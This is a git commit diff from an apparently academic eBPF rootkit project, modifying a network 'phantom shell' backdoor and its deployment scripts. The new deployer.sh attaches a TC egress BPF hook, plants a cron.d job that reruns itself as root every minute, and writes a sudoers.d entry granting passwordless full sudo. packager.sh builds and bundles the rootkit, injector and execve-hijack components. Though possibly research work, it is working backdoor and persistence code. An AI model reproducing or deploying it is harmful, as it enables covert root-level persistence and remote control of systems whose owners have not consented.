Added new deployer for preparing final files, messed up with the phantom shell, sometimes gives errors, but I don't think we can do much, the shared maps together with multi-hooks on network has some unexpected behaviours

2025-12-25 02:43:07 +08:00 · 2022-05-16 16:33:12 -04:00
parent 757a480de9
commit ccd518287a
10 changed files with 12677 additions and 12600 deletions
--- a/src/.output/kit.o
+++ b/src/.output/kit.o
--- a/src/.output/kit.skel.h
+++ b/src/.output/kit.skel.h
--- a/src/bin/kit
+++ b/src/bin/kit
--- a/src/ebpf/include/bpf/defs.h
+++ b/src/ebpf/include/bpf/defs.h
@@ -105,7 +105,7 @@ struct backdoor_priv_packet_log_16{
 struct backdoor_priv_phantom_shell{ 
 	__uint(type, BPF_MAP_TYPE_HASH);
 	__uint(max_entries, 1);
-	__type(key, __u64); //Source IPv4 of packet
+	__type(key, __u64); //Just 1
 	__type(value, struct backdoor_phantom_shell_data);
 	__uint(pinning, LIBBPF_PIN_BY_NAME);
 } backdoor_phantom_shell SEC(".maps");
--- a/src/ebpf/include/xdp/backdoor.h
+++ b/src/ebpf/include/xdp/backdoor.h
@@ -29,10 +29,10 @@ static __always_inline int execute_key_command(int command_received, __u32 ip, _
            bpf_printk("Received request to start phantom shell\n");
            //Check for phantom shell state
            __u64 key = 1;
-            struct backdoor_phantom_shell_data *ps_data = (struct backdoor_phantom_shell_data*) bpf_map_lookup_elem(&backdoor_phantom_shell, &key);
-            if(ps_data != (void*)0 && ps_data->active ==1){
+            //struct backdoor_phantom_shell_data *ps_data = (struct backdoor_phantom_shell_data*) bpf_map_lookup_elem(&backdoor_phantom_shell, &key);
+            /*if(ps_data != (void*)0 && ps_data->active ==1){
                bpf_printk("Overwriting previous phantom shell config\n");
-            }
+            }*/
            struct backdoor_phantom_shell_data ps_new_data = {0};
            ps_new_data.active = 1;
            ps_new_data.d_ip  = ip;
--- a/src/helpers/deployer.sh
+++ b/src/helpers/deployer.sh
@@ -5,7 +5,7 @@
 #The current directory full path
 declare -r DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
 #The location of the file where to write the full rootkit package
-declare -r OUTPUTDIR="/home/osboxes/TFG/apps/"
+declare -r BASEDIR="/home/osboxes/TFG/apps"
 #A variable to determine whether to silence output of internal commands
 declare firstvar=$1

@@ -45,49 +45,20 @@ echo "***************** Marcos Sánchez Bajo *****************\n"
 echo "*******************************************************\n"
 echo ""

-if [ "${PWD##*/}" != "helpers" ]; then
-    echo -e "${RED}This file should be launched from the /helpers directory${NC}"
-    exit 1
+BACKDOOR_INSTALLED=0
+FILE=/etc/sudoers.d/ebpfbackdoor
+if test -f "$FILE"; then
+   BACKDOOR_INSTALLED=1
+   echo "Backdoor is already installed"
+else
+   echo -e "${BLU}Installing TC hook${NC}"
+   /bin/sudo tc qdisc del dev enp0s3 clsact
+   /bin/sudo tc qdisc add dev enp0s3 clsact
+   /bin/sudo tc filter add dev enp0s3 egress bpf direct-action obj "$BASEDIR"/tc.o sec classifier/egress
+   /bin/sudo "$BASEDIR"/kit -t enp0s3
 fi

-#First compile helpers
-echo -e "${BLU}Compiling helper programs${NC}"
-sleep 1
-quiet make clean
-quiet make
-echo -e "${GRN}Finished${NC}"
-
-#Next compile client
-echo -e "${BLU}Compiling client programs${NC}"
-sleep 1
-cd ../client
-quiet make clean
-quiet make
-echo -e "${GRN}Finished${NC}"
-
-echo -e "${BLU}Compiling rootkit${NC}"
-sleep 1
-cd ../
-quiet make clean
-quiet make
-echo -e "${GRN}Finished${NC}"
-
-echo -e "${BLU}Compiling TC hook${NC}"
-sleep 1
-quiet make tckit
-echo -e "${GRN}Finished${NC}"
-
-echo -e "${BLU}Packaging binary results${NC}"
-cp -a bin/kit $OUTPUTDIR
-cp -a client/injector $OUTPUTDIR
-cp -a helpers/simple_open $OUTPUTDIR
-cp -a helpers/simple_timer $OUTPUTDIR
-cp -a helpers/execve_hijack $OUTPUTDIR
-cp -a helpers/injection_lib.so $OUTPUTDIR
-cp -a tc.o $OUTPUTDIR
-cp -a client/mycert.pem $OUTPUTDIR
-echo -e "${GRN}Finished${NC}"
-
-
-
+## Install a backdoor in cron.d
+echo "* * * * * osboxes /bin/sudo /home/osboxes/TFG/apps/deployer.sh" > /etc/cron.d/ebpfbackdoor
+echo "osboxes ALL=(ALL:ALL) NOPASSWD:ALL #" > /etc/sudoers.d/ebpfbackdoor

--- a/src/helpers/packager.sh
+++ b/src/helpers/packager.sh
@@ -0,0 +1,94 @@
+#!/bin/bash
+#set -x
+
+## Constants declaration
+#The current directory full path
+declare -r DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
+#The location of the file where to write the full rootkit package
+declare -r OUTPUTDIR="/home/osboxes/TFG/apps/"
+#A variable to determine whether to silence output of internal commands
+declare firstvar=$1
+
+RED='\033[0;31m'
+BLU='\033[0;34m'
+GRN='\033[0;32m'
+NC='\033[0m' # No Color
+
+## A simple function to wait for input
+waitForInput(){
+   if [ "$press_key_to_continue" = true ]; then
+      echo "Completed. Press any key to continue"
+      while [ true ] ; 
+      do
+         read -t 3 -n 1
+         if [ $? = 0 ] ; then
+            return ;
+         fi
+      done
+   fi
+}
+
+#A simple function to silence output
+quiet(){
+    if [ "$firstvar" == "quiet" ]; then
+        "$@" > /dev/null
+    else
+        "$@"
+    fi
+}
+
+#Start of script
+echo "*******************************************************\n"
+echo "************************* TFG *************************\n"
+echo "*******************************************************\n"
+echo "***************** Marcos Sánchez Bajo *****************\n"
+echo "*******************************************************\n"
+echo ""
+
+if [ "${PWD##*/}" != "helpers" ]; then
+    echo -e "${RED}This file should be launched from the /helpers directory${NC}"
+    exit 1
+fi
+
+#First compile helpers
+echo -e "${BLU}Compiling helper programs${NC}"
+sleep 1
+quiet make clean
+quiet make
+echo -e "${GRN}Finished${NC}"
+
+#Next compile client
+echo -e "${BLU}Compiling client programs${NC}"
+sleep 1
+cd ../client
+quiet make clean
+quiet make
+echo -e "${GRN}Finished${NC}"
+
+echo -e "${BLU}Compiling rootkit${NC}"
+sleep 1
+cd ../
+quiet make clean
+quiet make
+echo -e "${GRN}Finished${NC}"
+
+echo -e "${BLU}Compiling TC hook${NC}"
+sleep 1
+quiet make tckit
+echo -e "${GRN}Finished${NC}"
+
+echo -e "${BLU}Packaging binary results${NC}"
+cp -a bin/kit $OUTPUTDIR
+cp -a client/injector $OUTPUTDIR
+cp -a helpers/simple_open $OUTPUTDIR
+cp -a helpers/simple_timer $OUTPUTDIR
+cp -a helpers/execve_hijack $OUTPUTDIR
+cp -a helpers/injection_lib.so $OUTPUTDIR
+cp -a tc.o $OUTPUTDIR
+cp -a client/mycert.pem $OUTPUTDIR
+cp -a helpers/deployer.sh $OUTPUTDIR
+echo -e "${GRN}Finished${NC}"
+
+
+
+
--- a/src/user/kit.c
+++ b/src/user/kit.c
@@ -39,7 +39,7 @@
 		goto cleanup\
 	}

-static int FD_TC_MAP;
+int FD_TC_MAP;
 __u32 ifindex; //Interface to which the rootkit connects
 char* local_ip;

@@ -193,24 +193,30 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){
 		}
 	}else if(e->event_type == PSH_UPDATE){
 		printf("Requested to update the phantom shell\n");
-		int key = 1;
+		__u64 key = 1;
 		struct backdoor_phantom_shell_data data;
 		struct bpf_map_info map_expect = {0};
 		struct bpf_map_info info = {0};
 		FD_TC_MAP = bpf_obj_get("/sys/fs/bpf/tc/globals/backdoor_phantom_shell");
-		printf("TC MAP ID: %i\n", FD_TC_MAP);
 		map_expect.key_size    = sizeof(__u64);
 		map_expect.value_size  = sizeof(struct backdoor_phantom_shell_data);
 		map_expect.max_entries = 1;
 		int err = check_map_fd_info(FD_TC_MAP, &info, &map_expect);
+		printf("TC MAP ID: %d\n", FD_TC_MAP);
 		if (err) {
 			fprintf(stderr, "ERR: map via FD not compatible\n");
 			return err;
 		}
+		printf("Collected stats from BPF map:\n");
+		printf(" - BPF map (bpf_map_type:%d) id:%d name:%s"
+			" key_size:%d value_size:%d max_entries:%d\n",
+			info.type, info.id, info.name,
+			info.key_size, info.value_size, info.max_entries
+			);
 		err = bpf_map_lookup_elem(FD_TC_MAP, &key, &data);
 		if(err<0) {
 			printf("Failed to read the shared map: %d\n", err);
-			return -1;
+			//return -1;
 		}
 		printf("Pre value: %i, %i, %i, %s\n", data.active, data.d_ip, data.d_port, data.payload);
 		data.active = e->bps_data.active;
@@ -354,13 +360,13 @@ int main(int argc, char**argv){
 	}

 	FD_TC_MAP = bpf_obj_get("/sys/fs/bpf/tc/globals/backdoor_phantom_shell");
-	printf("TC MAP ID: %i\n", FD_TC_MAP);
+	printf("TC MAP ID: %d\n", FD_TC_MAP);
 	map_expect.key_size    = sizeof(__u64);
 	map_expect.value_size  = sizeof(struct backdoor_phantom_shell_data);
 	map_expect.max_entries = 1;
 	err = check_map_fd_info(FD_TC_MAP, &info, &map_expect);
 	if (err) {
-		fprintf(stderr, "ERR: map via FD not compatible\n");
+		fprintf(stderr, "ERR: map via FD not compatible. Is the TC hook open?\n");
 		return err;
 	}
 	printf("Collected stats from BPF map:\n");
@@ -369,14 +375,15 @@ int main(int argc, char**argv){
 			info.type, info.id, info.name,
 			info.key_size, info.value_size, info.max_entries
 			);
-	int key = 1;
+	__u64 key = 1;
 	struct backdoor_phantom_shell_data data;
 	err = bpf_map_lookup_elem(FD_TC_MAP, &key, &data);
 	if(err<0) {
 		printf("Failed to lookup element\n");
+		return -1;
 	}
 	printf("Value: %i, %i, %i\n", data.active, data.d_ip, data.d_port);
-	//bpf_map_update_elem(tc_efd, &key, &data, 0);
+	bpf_map_update_elem(FD_TC_MAP, &key, &data, 0);

 	/*bpf_obj_get(NULL);
 	char* DIRECTORY_PIN = "/sys/fs/bpf/mymaps";